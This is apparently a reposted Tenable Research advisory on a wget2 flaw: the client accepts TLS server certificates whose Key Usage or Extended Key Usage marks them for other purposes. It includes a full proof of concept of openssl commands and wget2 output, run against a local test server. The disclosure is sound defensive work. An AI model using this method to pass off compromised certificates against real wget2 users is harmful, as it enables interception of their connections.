wget2 Improper Certificate Validation

By
Editor Dataproof
-
0
9

wget2 Improper Certificate Validation

Tenable Research discovered that wget2 accepts a server certificate with incorrect Key Usage (KU) or Extended Key Usage (EKU). If the attackers compromise a certificate (with the associated private key) issued for a different purpose, they may be able to reuse it for TLS server authentication.

 

Proof of Concept

In this PoC, we will demonstrate generating private keys and the corresponding X.509 certificates, configuring a TLS server to use them, and then how wget2 fails to properly validate certificates not meant to be used for TLS server authentication. In a real attack, the attackers would reuse the X.509 certificate and its corresponding key they managed to compromise.

 

Generate a set of RSA keys:

openssl genrsa -out ca-key.pem 2048

openssl genrsa -out server-key.pem 2048

 

Create an OpenSSL config:

cat openssl-ca.cfg 

[ ca ]

keyUsage                = critical,digitalSignature,keyCertSign,cRLSign

extendedKeyUsage        = serverAuth,clientAuth

basicConstraints        = critical,CA:TRUE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

[ server ]

keyUsage                = critical,digitalSignature

extendedKeyUsage        = serverAuth

basicConstraints        = critical,CA:FALSE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

[ server-bad-eku ]

keyUsage                = critical,digitalSignature

extendedKeyUsage        = codeSigning

basicConstraints        = critical,CA:FALSE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

[ server-bad-ku ]

keyUsage                = critical,cRLSign

extendedKeyUsage        = serverAuth

basicConstraints        = critical,CA:FALSE

subjectKeyIdentifier    = hash

authorityKeyIdentifier  = keyid:always

 

Generate root CA certificate:

openssl req -x509 -new -key ca-key.pem -days 365 -out ca-cert.pem -subj “/CN=TestCA” -config openssl-ca.cfg -extensions ca

 

Generate a certificate signing request:

openssl req -new -key server-key.pem -out server.csr -subj “/CN=server” -addext “subjectAltName = DNS:localhost”

 

Generate a valid server certificate:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server -copy_extensions copyall

 

Check EKU and KU in the generated certificate:

openssl x509 -text -noout -in server-cert.pem | grep -i ‘Key Usage’ -A1

            X509v3 Key Usage: critical

                Digital Signature

            X509v3 Extended Key Usage: 

                TLS Web Server Authentication

 

Generate invalid server certificates with incorrect EKU and KU:

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-eku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-eku -copy_extensions copyall

 

openssl x509 -req -CA ca-cert.pem -CAkey ca-key.pem -CAcreateserial -in server.csr -out server-bad-ku-cert.pem -days 365 -extfile openssl-ca.cfg -extensions server-bad-ku -copy_extensions copyall

 

Check EKU and KU in the generated certificates:

openssl x509 -text -noout -in server-bad-eku-cert.pem | grep -i ‘Key Usage’ -A1

            X509v3 Key Usage: critical

                Digital Signature

            X509v3 Extended Key Usage: 

                Code Signing

 

openssl x509 -text -noout -in server-bad-ku-cert.pem | grep -i ‘Key Usage’ -A1

            X509v3 Key Usage: critical

                CRL Sign

            X509v3 Extended Key Usage: 

                TLS Web Server Authentication

 

Start a server using a valid server certificate:

openssl s_server -key server-key.pem -cert server-cert.pem -www -port 8080

 

Connection succeeds as expected:

wget2 https://localhost:8080 –ca-certificate ca-cert.pem

index.html           100% [=====================================================================================================================================================>]    4.71K    –.-KB/s

                          [Files: 1  Bytes: 4.71K [337.12KB/s] Redirects: 0  Todo: 0  Errors: 0 

 

Start a server using a server certificate with incorrect EKU:

openssl s_server -key server-key.pem -cert server-bad-eku-cert.pem -www -port 8080

 

Connection succeeds while it shouldn’t:

wget2 https://localhost:8080 –ca-certificate ca-cert.pem

index.html.1         100% [=====================================================================================================================================================>]    4.72K    –.-KB/s

                          [Files: 1  Bytes: 4.72K [236.37KB/s] Redirects: 0  Todo: 0  Errors: 0  

 

Start a server using a server certificate with incorrect KU:

openssl s_server -key server-key.pem -cert server-bad-ku-cert.pem -www -port 8080

 

Connection again succeeds while it shouldn’t:

wget2 https://localhost:8080 –ca-certificate ca-cert.pem

index.html.2         100% [=====================================================================================================================================================>]    4.72K    –.-KB/s

                          [Files: 1  Bytes: 4.72K [214.84KB/s] Redirects: 0  Todo: 0  Errors: 0

 

In the last two cases, wget2 accepted server certificates with incorrect EKU or KU.

Ben Smith
– Read more

RELATED ARTICLESMORE FROM AUTHOR